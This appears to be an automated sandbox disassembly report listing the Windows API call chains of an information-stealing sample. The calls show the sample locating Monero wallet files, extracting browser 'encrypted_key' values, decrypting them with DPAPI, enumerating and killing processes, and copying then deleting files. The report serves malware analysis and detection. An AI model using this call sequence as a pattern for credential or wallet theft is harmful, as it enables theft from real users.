                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053D481
                                  • lstrlen.KERNEL32(00000000), ref: 0053D698
                                  • lstrlen.KERNEL32(00000000), ref: 0053D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053D801
                                  • lstrlen.KERNEL32(00000000), ref: 0053D99F
                                  • lstrlen.KERNEL32(00000000), ref: 0053D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 00f1d2e19dff670bdc6c08ca954f05c9078397014215fb855681c6aee87f6706
                                  • Instruction ID: 54fca73dd20880e23da5d41f6670283aa70a7c49e2d99d3c6ad9da6ca4d13c2d
                                  • Opcode Fuzzy Hash: 00f1d2e19dff670bdc6c08ca954f05c9078397014215fb855681c6aee87f6706
                                  • Instruction Fuzzy Hash: 3F813672850105ABEB44FBB0DC5AEEE7B38FF94308F514519F407A6091EF346A49CB66
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00551580,00550D92), ref: 0053F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0053F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 75673bc10c5142e1310042dc97aa2b0e772ff7aa0ee95d6955bbfac6857881b0
                                  • Instruction ID: 6cc95c82befa7bbaca2d568f23373a232e7f5afeeda048950c889eb85bc4d1a0
                                  • Opcode Fuzzy Hash: 75673bc10c5142e1310042dc97aa2b0e772ff7aa0ee95d6955bbfac6857881b0
                                  • Instruction Fuzzy Hash: 83511471D50109AAEB54FBB0DC5ADED7B38FFD4308F408528F81667191EE346A09CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 961878ff2832cccabd7c1eca3df4b45de78919eb7d658c7fcfa8775d727a9039
                                  • Instruction ID: 49b4f978ef1d09ccd2b42bd0a46f8bd784998b7368dfcd411bc82ec81edb28a4
                                  • Opcode Fuzzy Hash: 961878ff2832cccabd7c1eca3df4b45de78919eb7d658c7fcfa8775d727a9039
                                  • Instruction Fuzzy Hash: A9413371D1010AABDB04EFA4D855AFEBB74FF54308F008418E41676291DB75AA09CF92
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00539D39
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                    • Part of subcall function 00539AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                    • Part of subcall function 00539AC0: LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                    • Part of subcall function 00539B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00539B84
                                    • Part of subcall function 00539B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00539BA3
                                    • Part of subcall function 00539B60: LocalFree.KERNEL32(?), ref: 00539BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7f8fa45d6bd988c95f9a1b24fa9f04b5388db37c9defd0c3ccc8bb447e4cc2ca
                                  • Instruction ID: 41730380ff12a899cd42d0dc9546b433fdb396fa33eba9aa0656bdcb80b872d6
                                  • Opcode Fuzzy Hash: 7f8fa45d6bd988c95f9a1b24fa9f04b5388db37c9defd0c3ccc8bb447e4cc2ca
                                  • Instruction Fuzzy Hash: 8B3132B6D10109ABDF14DFE4DC86AEFBBB8BF88304F144919E905A7241E7749A04CBA5
                                  APIs
                                  • memset.MSVCRT ref: 005494EB
                                    • Part of subcall function 00548D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0054951E,00000000), ref: 00548D5B
                                    • Part of subcall function 00548D50: RtlAllocateHeap.NTDLL(00000000), ref: 00548D62
                                    • Part of subcall function 00548D50: wsprintfW.USER32 ref: 00548D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005495AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 005495C9
                                  • CloseHandle.KERNEL32(00000000), ref: 005495D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 99538d6b08a421df4cc8329969151ea3cb00d930fc32888221f946f55fc7cbce
                                  • Instruction ID: 650f055a981969dc4f3e75552e13131a54a82026988dc14d1159eda2f430d507
                                  • Opcode Fuzzy Hash: 99538d6b08a421df4cc8329969151ea3cb00d930fc32888221f946f55fc7cbce
                                  • Instruction Fuzzy Hash: 71311E71E00208AFEB14DFD0CD49BEEB774FF84305F208559E50AAA184DB789A89CB56
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005505B7), ref: 005486CA
                                  • Process32First.KERNEL32(?,00000128), ref: 005486DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 005486F3
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • CloseHandle.KERNEL32(?), ref: 00548761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 7d07f00f7899340fc8654454f2e3f3ad80d75a068507d6a4d722da85f0639f87
                                  • Instruction ID: 72869a5f5442338a26458dd74445a44e9268e48752f469af85d0b6cceb4b38a3
                                  • Opcode Fuzzy Hash: 7d07f00f7899340fc8654454f2e3f3ad80d75a068507d6a4d722da85f0639f87
                                  • Instruction Fuzzy Hash: E6318D71941219ABDB64DF50CC59FEEBB78FB84704F108199E10AA21A0DB346A44CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00550E00,00000000,?), ref: 005479B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 005479B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00550E00,00000000,?), ref: 005479C4
                                  • wsprintfA.USER32 ref: 005479F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 090b414547e2ecf49d4fd59a9f76a98f796f333c9e858f8bdfb4005437534064
                                  • Instruction ID: b94758e6caa7bac57e8bd6d4f409af0a0c2dc540d7e4a41ab3cbb24fa54fbd06
                                  • Opcode Fuzzy Hash: 090b414547e2ecf49d4fd59a9f76a98f796f333c9e858f8bdfb4005437534064
                                  • Instruction Fuzzy Hash: C41118B2904118AADB149FC9DD45BBEBBF8FB4CB11F14425AF605A2280D2395940CBB5
                                  APIs
                                  • __getptd.LIBCMT ref: 0054C74E
                                    • Part of subcall function 0054BF9F: __amsg_exit.LIBCMT ref: 0054BFAF
                                  • __getptd.LIBCMT ref: 0054C765
                                  • __amsg_exit.LIBCMT ref: 0054C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0054C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: d6c8bb19e6dd81b0c9f5dc1388daaacc17f4fce017a18ce2f7fe4ec8820c2389
                                  • Instruction ID: 71f87f1eb87d512c83a5b10778d66fd2dfba0653f369d01683c5e135ceaa90ee
                                  • Opcode Fuzzy Hash: d6c8bb19e6dd81b0c9f5dc1388daaacc17f4fce017a18ce2f7fe4ec8820c2389
                                  • Instruction Fuzzy Hash: 64F0BB32942702ABE7A0BB78580F7DD3FA0BFC072DF10414DF404A71D2DB6499449E56
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544F7A
                                  • lstrcat.KERNEL32(?,00551070), ref: 00544F97
                                  • lstrcat.KERNEL32(?,011F90A8), ref: 00544FAB
                                  • lstrcat.KERNEL32(?,00551074), ref: 00544FBD
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 0054492C
                                    • Part of subcall function 00544910: FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                    • Part of subcall function 00544910: FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                    • Part of subcall function 00544910: FindClose.KERNEL32(000000FF), ref: 00544B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4f93bf92d04745462ce98c20afb4a039dd1c9096c056ecc4f3dafa8bd7e63a90
                                  • Instruction ID: 9bdcb49f1db4a45f67c5f5ce5bbf3ca332ab46fae81cdfd08cfc9215991e542e
                                  • Opcode Fuzzy Hash: 4f93bf92d04745462ce98c20afb4a039dd1c9096c056ecc4f3dafa8bd7e63a90
                                  • Instruction Fuzzy Hash: CE21867690020977D754FBB0DC4AEED3B3CBBD4341F008555B65A92181EE749AC88F96